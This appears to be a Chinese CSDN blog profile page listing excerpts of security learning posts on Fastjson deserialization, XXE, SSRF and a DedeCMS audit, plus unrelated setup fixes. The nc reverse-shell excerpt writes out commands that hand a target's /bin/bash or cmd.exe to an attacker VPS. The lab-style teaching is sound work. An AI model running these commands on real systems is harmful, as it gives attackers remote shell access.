- 博客(12)
- 收藏
- 关注
原创 fastjson反序列化漏洞
这里写自定义目录标题Fastjson<=1.2.47环境:1)Docker vulhub搭建环境2)jdk安装3)marshalsec与Exploit.java下载4)编译Exploit.java文件5)python开启web服务6)开启rmi服务7) nc开启端口监听8)漏洞探测9)反弹shellFastjson<=1.2.24Fastjson<=1.2.47环境:Centos7 靶机(docker环境)Centos7 vps攻击机Vulhub fastjson-1.2.47
2021-02-13 12:08:06
7478
2
原创 内网渗透:nc反弹shell总结
1、实验环境Kali:192.168.32.132 //模拟靶机Windows:192.168.32.1 //模拟公网vps2、若靶机上存在nc,获取反向shell:vps攻击机:nc -lvp 9999 // 监听9999端口靶机:nc 1.1.1.1 9999 -e /bin/bash // Linux正向连接公网vps1.1.1.1的9999端口 nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe // Windows3、若
2021-01-03 11:17:26
6473
原创 解决Linux提示E: 无法获得锁 /var/lib/dpkg/lock-frontend - open问题
准备为新安装的ubuntu安装ssh,提示如下:解决方法:运行sudo rm /var/lib/dpkg/lock-frontend,强制解锁即可。再次安装ssh:
2020-12-26 11:15:49
1710
原创 XXE原理利用与防御
0x00 前言一个认真搞安全的Student,博客用于学习总结,欢迎大家交流指出不足。***更欢迎大家去我的博客提出意见:***xiao’s blog0x01 XXE原理在讲XXE之前,先了解一下XML的结构XXE即XML实体注入,漏洞主要发生在XML的DTD部分,关键字SYSTEM能够读取URI里面的内容,将读取到的内容赋值到实体中,XML在使用的过程中,将实体输出,从而产生漏洞。P...
2020-04-19 22:49:15
501
原创 SSRF原理利用与防御
0x00 前言一个认真搞安全的Student,博客用于学习总结,欢迎大家交流指出不足。SSRF作为不可忽视的漏洞,地位举足轻重,本篇就SSRF的原理、利用、防御进行一个小小的总结。0x01 SSRF原理1)什么是SSRF服务器请求伪造,攻击者利用可以发起网络请求的服务来对其他网络服务进行攻击。2)SSRF的作用一般用于探测内网端口信息,查看文件,甚至可以getshell3)SSRF...
2020-04-18 18:02:18
472
转载 virtualenvwrapper.sh报错: There was a problem running the initialization hooks.解决
请查看这位大神的博客:https://www.cnblogs.com/cpl9412290130/p/10019231.html完美解决我的问题
2019-11-03 10:47:30
714
原创 dedecmsv5.7sp1远程文件包含漏洞审计
漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖以至于最后引起远程文件包含漏洞。
2019-10-27 00:19:37
769
原创 Python3.7下载与安装pygame
首先下载对应的pygame版本,注意32位与64位:https://www.lfd.uci.edu/~gohlke/pythonlibs/#pygame我这里下载的是:pygame-1.9.4-cp37-cp37m-win_amd64.whl在安装目录下面直接cmd运行安装pygame:python -m pip install pygame-1.9.4-cp37-cp37m-win_am...
2019-08-12 17:16:44
2543
原创 路由篇二:OSPF邻居建立过程(图文)
邻居状态机:Down --> Init–> 2 Way --> exStart–> exchange --> loading --> full(邻居) (预启动) (预交互) (加载) (邻接)1.HELLO报文HELLO报文的作用:邻居状态的建立、维护、拆除;作用于:Down --> Init–> 2 Way2.DBD报文DBD报...
2019-07-25 15:33:04
1526
原创 路由篇一:RIP路由环路形成及防环
RIP路由环路形成及防环认识环路及防环前先清楚RIP路由算法:Bellman算法(贝尔曼):①如果收到邻居给的路由,若本地没有,则接收;②如果收到邻居给的路由,若本地有,根据度量值对比,若优则录入,若劣质则丢弃;③如果收到邻居给的路由,若劣质,但是还是从原有的邻居学到的,也录入。环路的形成:正常情况下:A会像平常一样每30S广播路由表,把A=1(1为跳数,下同)给到R1,R2学到...
2019-07-25 11:59:40
5154
1
转载 secureCRT命令行字符重叠只显示一半
secureCRT命令行字符重叠只显示一半转载至这位的:https://blog.csdn.net/yuanhaiwn/article/details/80630973很好的解决问题
2019-07-25 10:31:59
5517
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人